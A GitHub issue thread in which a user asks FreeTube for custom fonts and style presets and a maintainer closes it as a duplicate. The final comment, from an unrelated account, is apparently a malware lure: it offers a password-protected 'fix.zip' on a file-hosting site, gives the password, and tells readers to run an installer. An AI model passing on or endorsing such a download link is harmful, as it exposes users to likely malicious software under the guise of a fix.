### ISSUE TITLE
[Feature Request]: More Customization

### ISSUE THREAD

**Issue by MohamedBhaa** [FreeTubeApp/FreeTube#5604] opened 2024-08-26 01:52 UTC
### Guidelines

- [X] I have searched the issue tracker for [open](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aissue+is%3Aclosed) issues that are similar to the feature request I want to file, without success.
- [X] I have searched the [documentation](https://docs.freetubeapp.io/) for information that matches the description of the feature request I want to file, without success.
- [X] This issue contains only one feature request.

### Problem Description

The app is amazing but in my opinion you can extend its options by including users fonts and styles customization

### Proposed Solution

maybe you can let users use their system installed fonts

### Alternatives Considered

you can also let users choose from presets included in a drop down menu

### Issue Labels

new optional setting

**Comment by absidue** [comment] 2024-08-26 05:42
Duplicate of #38

**Closed** 2024-08-26 05:42 UTC
Labels: enhancement, E: new optional setting

**Comment by seeronline** [comment] 2024-08-26 06:43
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
